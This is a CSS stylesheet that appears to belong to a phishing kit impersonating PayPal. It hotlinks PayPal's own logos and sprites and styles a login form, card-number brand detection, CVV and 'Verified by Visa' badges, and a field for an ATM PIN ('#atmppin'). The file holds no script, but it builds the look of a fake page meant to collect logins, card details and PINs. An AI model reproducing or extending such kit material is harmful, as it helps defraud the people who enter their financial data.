
*{
    box-sizing: border-box;
}
body{
    min-height: 100%;
    color: #595959;
    margin: 0px;
    padding: 0px;
    font-family: HelveticaNeue,"Helvetica Neue",Helvetica,Arial,sans-serif;
    font-size: 93.75%;
}
.nameinfo{
    width: 1048px;
    margin: 0px auto 10px;
    overflow: auto;
}
.pageheadline{
    margin: 0px auto 1px;
    padding: 26px 0px 0px;
    min-height: 40px;
    overflow: auto;
    border-bottom: 1px solid rgba(0, 0, 0, 0.1);
    box-shadow: 0px 1px #FFF;
    text-shadow: 0px 1px #FFF;
    color: #666;
}
.pageheadline h2{
    color: #666;
    font-size: 22px;
    line-height: 36px;
    font-family: "HelveticaNeue-Light","Helvetica Neue Light","Helvetica Neue",Helvetica,Arial,sans-serif;
    font-weight: 300;
    margin: 0px;
    padding: 0px;
    padding-bottom: 9px;
}
.contenair{
    position: relative;
    width: 460px;
    margin: 60px auto 0px;
    padding-top: 60px;
    background-color: #F7F9FA;
    border-radius: 5px;
}
.logo{
    margin: 0px auto 30px;
    background: transparent url("https://www.paypalobjects.com/images/shared/paypal-logo-129x32.svg") no-repeat scroll center top / 129px 32px;
    width: 129px;
    height: 32px;
    display: block;
    text-indent: -999em;
}
.main{
    margin: 0px 15%;
    padding: 0px 0px 70px;
}
.textinput{
    position: relative;
    margin: 0px 0px 10px;
}
.inputspecial{
    position: relative;
    border: 1px solid #9DA3A6;
    border-radius: 3px;
}
.inputspecialBlue{
    border-color: #0079C1;
}
.inputspecial:focus > .inputspecial input:focus{
    border-color: #0079C1;
}
.textinput input{
    height: 40px;
    width: 100%;
    padding: 0px 10px;
    border: 1px solid #9DA3A6;
    background: #FFF none repeat scroll 0% 0%;
    text-overflow: ellipsis;
    box-sizing: border-box;
    border-radius: 5px;
    box-shadow: none;
    color: #000;
    font-size: 1em;
    font-family: Helvetica,Arial,sans-serif;
    font-weight: 400;
}
.actionsSpaced {
    margin-top: 30px;
}
.button{
    width: 100%;
    height: 44px;
    padding: 0px;
    border: 0px none;
    display: block;
    background-color: #009CDE;
    box-shadow: none;
    border-radius: 5px;
    box-sizing: border-box;
    cursor: pointer;
    -moz-appearance: none;
    color: #FFF;
    font-size: 1em;
    text-align: center;
    font-weight: 700;
    font-family: HelveticaNeue,"Helvetica Neue",Helvetica,Arial,sans-serif;
    text-shadow: none;
    text-decoration: none;
    transition: background-color 0.4s ease-out 0s;
}
.button:hover{
    text-decoration: underline;
}
.btnSign{
    width: 100%;
    height: 44px;
    padding: 0px;
    border: 0px none;
    display: block;
    background-color: #E1E7EB;
    color: #2C2E2F;
    box-shadow: none;
    border-radius: 5px;
    box-sizing: border-box;
    cursor: pointer;
    -moz-appearance: none;
    padding-top: 14px;
    font-size: 1em;
    text-align: center;
    font-weight: 700;
    font-family: HelveticaNeue,"Helvetica Neue",Helvetica,Arial,sans-serif;
    text-shadow: none;
    text-decoration: none;
    transition: background-color 0.4s ease-out 0s;
}
.btnSign:hover{
    text-decoration: underline;
}
.forgotLink {
    margin: 20px auto;
    padding-bottom: 20px;
    border-bottom: 1px solid #CBD2D6;
    text-align: center;
}
.forgotLink a , .link,.link:visited{
    color: #0079AD;
    font-family: HelveticaNeue,"Helvetica Neue",Helvetica,Arial,sans-serif;
    font-weight: 400;
    text-decoration: none;
    transition: color 0.2s ease-out 0s;
}
.forgotLink .link:hover{
    text-decoration: underline;
}
.textinput .hasErreur{
    border: 1px solid #C72F38;
    background-image: url("https://www.paypalobjects.com/webstatic/i/consumer/onboarding/sprite_form_2x.png");
    background-position: right 10px top -411px;
    background-size: 25px auto;
    background-repeat: no-repeat;
}
.textinputs .hasErreur{
    border: 1px solid #C72F38;
    background-image: url("https://www.paypalobjects.com/webstatic/i/consumer/onboarding/sprite_form_2x.png");
    background-position: right 10px top -411px;
    background-size: 25px auto;
    background-repeat: no-repeat;
}
.hasErreur2{
    border: 1px solid #C72F38;
    background-image: url("https://www.paypalobjects.com/webstatic/i/consumer/onboarding/sprite_form_2x.png");
    background-position: right 10px top -411px;
    background-size: 25px auto;
    background-repeat: no-repeat;
}
.erreurMessage{
    position: absolute;
    top: 1px;
    left: 0px;
    z-index: 1;
    width: 100%;
    padding: 10px;
    height: 0px;
    border-radius: 5px;
    background: #C72F38 none repeat scroll 0% 0%;
    color: #FFF;
    transition: all 0.3s ease-out 0s;
}
.erreurMessage.show{
    top: 36px;
    height: auto;
    border-radius: 0px;
    text-align: left;
}
.cards{
    margin: 10px;
    position: relative;
}
.address{
    margin: 0 10px;
    font-weight: 300;
    font-size: 15px;
    line-height: 5px;
}
.footer {
    margin: 20px auto 0px -40px;
    text-align: center;
    font-size: 11px;
    padding-bottom: 15px;
}
.footer ul {
    list-style-type: none;
}
.footer ul li:first-child {
    background: transparent none repeat scroll 0px 0px;
}
.footer ul li {
    display: inline-block;
    margin: 0px;
    padding-left: 0.4em;
}
.footer ul li a {
    margin-right: 0.5em;
    white-space: nowrap;
    color: #666;
    font-family: HelveticaNeue,"Helvetica Neue",Helvetica,Arial,sans-serif;
    font-weight: 400;
    text-decoration: none;
    transition: color 0.2s ease-out 0s;
}
.footer ul li a:hover{
    text-decoration: underline;
}
@media(max-device-width: 720px){

    .contenair{
        padding-top: 60px;
        background-color: #FFFFFF;
        border-radius: 5px;
        position: relative;
        width: 100%;
        margin: -30px auto 0px;
    }
}
.header{
    margin: 0px;
    padding: 1em;
    background: #F5F5F5 none repeat scroll 0% 0%;
    border-bottom: 1px solid #FFF;
    box-shadow: 0px 0px 15px 0px #B5B5B5;
}
.header .img{
    margin: 0px -10px;
    background: transparent url("https://www.paypalobjects.com/images/shared/paypal-logo-129x32.svg") no-repeat scroll center top / 100px auto;
    width: 129px;
    height: 32px;
    display: block;
    text-indent: -999em;
}
.warp{
    margin: 0px;
    padding: 1em;
    border-top: 1px solid #D7D7D7;
    min-height: 610px;
}
.grey-background{
    background-color: #F5F5F5;
    background: #F8F8F8 url("https://www.paypalobjects.com/webstatic/i/ex_ce2/scr/scr_content-bkgd.png") repeat scroll 0px 0px;
}
.navout{
    max-width: 1300px;
    margin: 30px auto;
    padding: 0px;
}
.navoutx{
    max-width: 550px;
    background-image: linear-gradient(rgba(38, 38, 38, 0.1) 0px, rgba(184, 184, 184, 0.1) 100%);
    border-radius: 8px;
    box-shadow: 0px 1px 0px rgba(0, 0, 0, 0.05) inset, 0px 1px 0px #FFF;
    border-width: 1px;
    border-style: solid;
    -moz-border-top-colors: none;
    -moz-border-right-colors: none;
    -moz-border-bottom-colors: none;
    -moz-border-left-colors: none;
    border-image: none;
    border-color: #C5C5C5 #D3D3D3 #EAEAEA;
    box-sizing: border-box;
    margin: 50px;
    margin-left: 7.5em;
    padding-right: 7px;
}
.nav-col {
    margin: 30px 100px;
    max-width: 550px;
    -webkit-border-radius: 3px;
    -moz-border-radius: 3px;
    border-radius: 3px;
}
.navinner{
    padding: 38px;
    background-color: #FFF;
    text-decoration: none;
}
.navinnerx{
    margin: 3px;
    padding: 24px;
    border-width: 1px;
    border-style: solid;
    -moz-border-top-colors: none;
    -moz-border-right-colors: none;
    -moz-border-bottom-colors: none;
    -moz-border-left-colors: none;
    border-image: none;
    border-radius: 5px;
    text-decoration: none;
    border-color: #E5E5E5 #D9D9D9 #CCC;
    box-shadow: 0px 2px 2px -1px rgba(0, 0, 0, 0.1);
    width: 100%;
    background-color: #FFF;
    position: relative;
}
.col-md-5{
    width: 41%;
}
.logo-block{
    max-width: 330px;
    height: 334px;
    background: #F5F5F5 none repeat scroll 0% 0%;
    margin: 30px;
    width: auto;
    float: left;
}
.logo-block .peek-sheld{
    max-width: 100%;
    margin: 60px auto 0 auto;
    width: 149px;
}
.logo-block-text{
    margin: 20px 20px 60px;
    border: 0px none;
    text-align: center;
}
.col-md-12{
    width: 100%;

}
.clearboth{
    clear: both;
}
.row{
    margin-left: -15px;
    margin-right: -15px;
}
.col-md-7{
    width: 58%;;
}
.col-md-5, .col-md-12,.col-md-7{
    position: relative;
    min-height: 1px;
    padding-left: 15px;
    padding-right: 15px;
}
.explan-warper{
    padding: 0px;
    margin-top: 54px;
    margin-left: 30px;
    margin-right: 10px;
    width: 60%;
    float: left;
}
.big-title{
    letter-spacing: -0.02em;
    font-size: 32px;
    font-family: "HelveticaNeueLight","HelveticaNeue-Light","Helvetica Neue Light","HelveticaNeue","Helvetica Neue","TeXGyreHerosRegular","Helvetica","Tahoma","Geneva","Arial",sans-serif;
    font-weight: 300;
    font-stretch: normal;
    line-height: 1;
    margin-bottom: 20px;
    margin-top: 0px;
}
.content{
    margin-right: auto;
    margin-left: auto;
    min-height: 300px;
    overflow: visible;
    background: transparent url("https://www.paypalobjects.com/webstatic/mktg/consumer/gradients/interior-gradient-top.png") repeat-x scroll center top;
}

*::after{
    box-sizing: border-box;
    content:"";
    display:table;
    clear:both;
}

@media(max-device-width: 1150px){
    .explan-warper{
        width: 45%;
        float: left;
    }
    .content{
        padding: 0;
    }

}
@media(max-device-width: 850px){
    .explan-warper{
       margin-top: 0;
        width: 90%;
    }
    .logo-block{
        max-width: none;
        height: 334px;
        background: #F5F5F5 none repeat scroll 0% 0%;
        margin: 0 0 30px 0;
        width: 100%;
        float: left;
    }
}
@media (max-device-width: 500px){
    .explan-warper{
        margin-top: 0;
        width: 90%;
    }
    .logo-block{
        max-width: none;
        height: 334px;
        background: #F5F5F5 none repeat scroll 0% 0%;
        margin: 0 0 30px 0;
        width: 100%;
        float: left;
    }
    .header .img{
        background: transparent url("https://www.paypalobjects.com/images/shared/paypal-logo-129x32.svg") no-repeat scroll center top / 95px auto;
        width: 129px;
        height: 32px;
        display: block;
        text-indent: -999em;
        margin: 0 auto;
    }
    .content{
        padding: 0;
    }
    body{
        min-width: 320px;
    }
    .warp{
        padding: 0;
    }
    .navout{
        margin: 0;
    }
    .nav-col{
        margin: 0;
        max-width: 550px;
        border-radius: 0px;
    }
    .navinner{
        padding: 18px;
    }
    .header{
        border-bottom: none;
    }
    .logo-block{
        width: auto;
    }
    .explan-warper{
        margin-top: 0px;
        width: 85%;
    }
}
.details-box{
    margin-top: 10px;
    margin-bottom: 20px;
    border: 1px solid #F8981F;
    border-radius: 3px;
}
.headers{
    font-weight: bold;
    background-color: #F1F1F1;
    padding: 1em;
    width: auto;
    margin-left: 0px;
    margin-right: 0px;
}
.white-header{
    background-color: #FFFFFF;
}
.loginmarker{
    margin: inherit;
    font-weight: normal;
    width: 100%;
}
label{
    display: inline-block;
}
.headers span{
    float: left;
    width: 30%;
    display: block;
    font-weight: 600;
    margin-right: 1%;
    color: #444;
}
.headers span.time{
    float: right;
    text-align: right;
}
.headers span.device{
    text-align: left;
}
.headers span.location{
    text-align: center;
}
.btn{
    display: inline-block;
    margin-bottom: 0px;
    font-weight: normal;
    text-align: center;
    vertical-align: middle;
    cursor: pointer;
    background-image: none;
    border: 1px solid transparent;
    white-space: nowrap;
    padding: 6px 12px;
    font-size: 14px;
    line-height: 1.42857;
    width: 100%;
    border-radius: 4px;
    -moz-user-select: none;
    padding-left: 4em;
    padding-right: 4em;
    margin-right: 2em;
}
.btnPremary{
    color: #FFF;
    background-color: #428BCA;
    border-color: #357EBD;
    text-decoration: none;
}
.two{
    max-width: 600px;
}

.thin-header{
    font-weight: 400;
    letter-spacing: -0.02em;
    font-size: 1.5em;
    line-height: 1.3;
    margin-bottom: 0.7em;
}
.form-group{
    margin-top: 22px;
    margin-bottom: 42px;
}
.explan2{
    padding: 0px;
    margin-right: 10px;
    float: left;

}
.selectDown{
    display: inline-block;
    overflow: hidden;
    width: 100%;
    height: 42px;
    margin: 10px 0px 0px;
    border: 1px solid #9DA3A6;
    border-radius: 5px;
    box-sizing: border-box;
    background: transparent url("https://www.paypalobjects.com/webstatic/i/sprite/sprite_ui.png") no-repeat scroll right -1684px;
    position: relative;
}
.selectDown:hover{
    box-shadow: 0px 0px 5px rgba(58, 144, 194, 0.6);
    border: 1px solid #57A9D9;
}
.selectDown select{
    border: 0px none;
    margin: 0px;
    padding: 11px 36px 7px 7px;
    height: 40px;
    background: transparent none repeat scroll 0% 0%;
    position: relative;
    color: #333;
    font: 1em/16px Arial;
    z-index: 10;
    width: 108%;
}
.hide{
    display: none;
}
.btnsac{
    padding-left: 39px;
    padding-right: 40px;
}
.notif{
    background-position: left 12px top -387px;
    border-color: #C72E2E;
}
.notif-cretic{
    padding: 15px 15px 15px 44px;
    border-radius: 5px;
    border-width: 1px;
    border-style: solid;
    text-align: left;
    font-size: 1em;
    background: #FFF7F7 url("https://www.paypalobjects.com/images/shared/icon_alert_sprite-2x.png") no-repeat scroll 10px -386px / 20px auto;
    background-position: 10px -386px;
}
.footers{
    padding-top: 0px;
    border-top: 1px solid #E7E7E7;
}
.footer-nav{
    padding: 1.5em 0px;
    background-color: #F5F5F5;
    font-size: 1.2em;
}
.footer-legal{
    padding: 1em 0px 10px;
    height: 100%;
    color: #FFF;
    font-weight: bold;
    background-color: #6d6e71;
}
.footers ul{
    display: inline;
    margin: 0px;
}
.footers ul li {
    list-style-type: none;
    display: inline;
    float: left;
    padding: 0px 20px 0px 0px;
}
.footers ul li a{
    color: #2C2E2F;
    text-decoration: none;
    font-size: 15px;
    font-weight: 600;
}
.footers .footer-nav ul li a:hover{
    text-decoration: none;
    color: #0079C1;
}
.container-fluid {
    margin-right: auto;
    margin-left: auto;
    padding-left: 15px;
    padding-right: 15px;
}
.copyright{
    display: inline;
    border-right: 1px solid #FFF;
    padding-right: 1em;
    float: left;
}
.footer-legal ul li:first-child{
    padding-left: 10px;
}
.footer-legal ul li a{
    color: white;
}
.footer-legal ul li a:hover{
    color: white;
    text-decoration: underline;
}
.copyright-short{
    display: none;
}
.textinputs{
    margin: 6px 10px;
    text-overflow: ellipsis;
}
.nav-col label{ margin: 15px 10px;}
.nav-col h2{ margin: 20px 10px; color: #444;}
.nav-col h4{ margin: 20px 10px; color: #444;}
.textinputs input{
    background-clip: padding-box;
    transition: border 0.2s ease-in-out 0s, background-color 0.2s ease-in-out 0s;
    outline: 0px none;
    padding: 0px 12px;
    border: 1px solid #A4ABAE;
    background-color: #FFF;
    height: 41px;
    width: 100%;
    border-radius: 3px;
    color: #2C2E2F;
    font-size: 1.031em;
    font-weight: normal;
    box-sizing: border-box;
    font-family: "HelveticaNeue-Light","Helvetica Neue Light","Helvetica Neue",Helvetica,Arial,sans-serif;
    text-transform: capitalize;
}

.textinputs-inrequid{
     margin: 6px 10px;
     text-overflow: ellipsis;
 }
.textinputs-inrequid input{
    background-clip: padding-box;
    transition: border 0.2s ease-in-out 0s, background-color 0.2s ease-in-out 0s;
    outline: 0px none;
    padding: 0px 12px;
    border: 1px solid #A4ABAE;
    background-color: #FFF;
    height: 41px;
    width: 100%;
    border-radius: 3px;
    color: #2C2E2F;
    font-size: 1.031em;
    font-weight: normal;
    box-sizing: border-box;
    font-family: "HelveticaNeue-Light","Helvetica Neue Light","Helvetica Neue",Helvetica,Arial,sans-serif;
    text-transform: capitalize;
}
.textinputs input:focus{
    border-color: #0079C1;
}
@media (max-device-width: 500px){
    .main {
        margin: 0px 5%;
        padding: 0px 0px 70px;
    }
    .buttons{
        margin: 30px 0;
    }
    .copyright{
        display: none;
    }
    .copyright-short{
        display: block;
    }
    .navinnerx{
        border-style: none;
        box-shadow: none;
    }
    .navoutx{
        border-style: none;
    }
}
.colum{
    float: left;
    position: relative;
    width: 100%;
}
.navoutright .image1{
    background: transparent url("https://www.paypalobjects.com/webstatic/mktg/consumer/auth/authflow_illustrations.png") no-repeat scroll -550px 0px;
    margin-top: 120px;
    min-height: 130px;
}
.navoutright .image2{
    background: transparent url("https://www.paypalobjects.com/webstatic/mktg/consumer/auth/authflow_illustrations.png") no-repeat scroll 0px 0px;
    margin-top: 50px;
    min-height: 130px;
}
.navoutright .image3{
    background: transparent url("img/url.png") no-repeat scroll 0px 0px / 220px auto;
    margin-top: 120px;
    min-height: 130px;
}
.navoutright .image4{
    background: transparent url("img/card.png") no-repeat scroll 0px 0px / 220px auto;
    margin-top: 50px;
    min-height: 130px;
}
.navoutright .image5{
    background: transparent url("authflow_illustrations.png") no-repeat scroll 0px 0px / 180px auto;
    margin-top: 120px;
    min-height: 130px;
}
.navoutright .image6{
    background: transparent url("hero_security.png") no-repeat scroll -17px 0px / 180px auto;
    margin-top: 40px;
    min-height: 160px;
}
.navoutright{
    width: 530px;
}
.navoutright h2{
    font-family: "HelveticaNeue-Light","Helvetica Neue Light","Helvetica Neue",Helvetica,Arial,sans-serif;
    font-weight: 300;
    padding-top: 20px;
    font-size: 1.38461em;
    line-height: 1.4em;
    padding-left: 232px;
    color: #666;
}
.navoutright p{
    padding-left: 232px;
    color: #666;
    line-height: 1.4615em;
    font-size: 81.25%;
    margin-top: -15px;
}
.error{
    outline: 0px none;
    font-size: 13px;
}
@media (max-device-width: 1180px) {
    .navoutright .image1{
        display: none;
    }
    .navoutright .image2{
        display: none;
    }
    .navoutright .image3{
        display: none;
    }
    .navoutright .image4{
        display: none;
    }
    .navoutright .image5{
        display: none;
    }
    .navoutright .image6{
        display: none;
    }
    .colum{
        float: none;
    }
    .nav-col{
        max-width: 100%
    }
    .navoutx{
        margin: 0px;
    }
}
#atmppin{
    width: 70%;
}
@media (max-device-width: 500px) {
    .navoutx{
        margin: 0;
    }
    .loginmarker{
        font-size: 11px;
    }
    #atmppin{
        width: 55%;
    }
}
.cc-num.identified{
    //border-color:#2ecc71;
}

/* when the card is identified on focus, make the box-shadow glow green too */
.cc-num.identified:focus{

}

/* style the blank card element */
.card {
    position: absolute;
    display: block;
    right: 0.75em;
    top: 21%;
    margin-top: 0px;
    width: 28px;
    height: 23px;
    background: transparent url("img/sprites_cc_global.png") no-repeat scroll 0 -314px / 100% auto;
}
.cardcvv {
    position: absolute;
    display: block;
    right: 0.75em;
    top: 21%;
    margin-top: 0px;
    width: 28px;
    height: 23px;
    background: transparent url("img/sprites_cc_global.png") no-repeat scroll 0 -337px / 100% auto;
}
.vbv{
    position: absolute;
    display: block;
    right: 0.75em;
    top: 25%;
    margin-top: 0px;
    width: 34px;
    height: 37px;
}
.vbv.visa{
    background: transparent url("img/noobvbv.gif") no-repeat scroll 0 0px / 100% auto;
}
.vbv.mastercard{
    top:31%;
    background: transparent url("img/noobms.gif") no-repeat scroll 0 0px / 100% auto;
}
/* replace the blank card with the card type */
.cc-num.visa + .card{
    background: url("img/sprites_cc_global.png") no-repeat scroll 0 2px / 100% auto;
}
.cc-num.mastercard + .card{
    background: url("img/sprites_cc_global.png") no-repeat scroll 0 -21px / 100% auto;
}
.cc-num.amex + .card{
    background: url("img/sprites_cc_global.png") no-repeat scroll 0 -44px / 100% auto;
}
.cc-num.discover + .card{
    background: url("img/sprites_cc_global.png") no-repeat scroll 0 -66px / 100% auto;
}
.cc-num.dinersclub + .card{
    background: url("img/sprites_cc_global.png") no-repeat scroll 0 -89px / 100% auto;
}
.cc-num.jcb + .card{
    background: url("img/sprites_cc_global.png") no-repeat scroll 0 -112px / 100% auto;
}
.cc-num.maestro + .card{
    background: url("img/sprites_cc_global.png") no-repeat scroll 0 -134px / 100% auto;
}
.cc-num.visaelectron  + .card{
    background: url("img/sprites_cc_global.png") no-repeat scroll 0 -156px / 100% auto;
}

.cardbrand {
    position: absolute;
    display: block;
    left: 13.75em;
    top: 8%;
    margin-top: -4px;
    width: 28px;
    height: 23px;
    background: transparent url("img/sprites_cc_global.png") no-repeat scroll 0px -337px / 100% auto;
}

.cardbrand.visa {
    background: url("img/sprites_cc_global.png") no-repeat scroll 0 2px / 100% auto;
}
.cardbrand.mastercard{
    background: url("img/sprites_cc_global.png") no-repeat scroll 0 -21px / 100% auto;
}
.cardbrand.amex {
    background: url("img/sprites_cc_global.png") no-repeat scroll 0 -44px / 100% auto;
}
.cardbrand.discover{
    background: url("img/sprites_cc_global.png") no-repeat scroll 0 -66px / 100% auto;
}
.cardbrand.dinersclub{
    background: url("img/sprites_cc_global.png") no-repeat scroll 0 -89px / 100% auto;
}
.cardbrand.jcb + .cardbrand{
    background: url("img/sprites_cc_global.png") no-repeat scroll 0 -112px / 100% auto;
}
.maestro + .cardbrand{
    background: url("img/sprites_cc_global.png") no-repeat scroll 0 -134px / 100% auto;
}
.visaelectron  + .cardbrand{
    background: url("img/sprites_cc_global.png") no-repeat scroll 0 -156px / 100% auto;
}
.check_box{
    background-image: url("img/onboarding_form.png");
    background-repeat: no-repeat;
    padding-left: 28px;
    line-height: 26px;
    display: inline-block;
    margin: 15px 10px;
    cursor: pointer;
}
#checked{
    background-position: 0px -100px;
}
#inchecked{
    background-position: 0px 0px;
}
.spinner{
    position: fixed;
    top: 43%;
    right: 0px;
    bottom: 0px;
    left: 0px;
    z-index: 200;
    margin: 0px;
    text-align: center;
}
.spinner::before{
    content: "";
    display: block;
    margin: 0px auto 10px;
    text-align: center;
    width: 34px;
    height: 34px;
    border-width: 8px;
    border-style: solid;
    border-color: #2180C0 rgba(0, 0, 0, 0.2) rgba(0, 0, 0, 0.2);
    border-radius: 50px;
    animation: 0.7s linear 0s normal none infinite running rotation;
}
.spinner::after{
    content: "";
    position: fixed;
    z-index: -1;
    top: 0px;
    right: 0px;
    bottom: 0px;
    left: 0px;
    background: #FFF none repeat scroll 0% 0%;
    opacity: 0.9;
}
@-webkit-keyframes rotation {
    from {
        -webkit-transform:rotate(0deg);
        transform:rotate(0deg)
    }
    to {
        -webkit-transform:rotate(359deg);
        transform:rotate(359deg)
    }
}
@-moz-keyframes rotation {
    from {
        -moz-transform:rotate(0deg);
        transform:rotate(0deg)
    }
    to {
        -moz-transform:rotate(359deg);
        transform:rotate(359deg)
    }
}
@-o-keyframes rotation {
    from {
        -o-transform:rotate(0deg);
        transform:rotate(0deg)
    }
    to {
        -o-transform:rotate(359deg);
        transform:rotate(359deg)
    }
}
@-ms-keyframes rotation {
    from{
        -ms-transform: rotate(0deg);
        transform: rotate(0deg);
    }
    to {
        -ms-transform:rotate(359deg);
        transform:rotate(359deg)
    }
}
@keyframes rotation {
    from {
        transform:rotate(0deg)
    }
    to {
        transform:rotate(359deg)
    }
}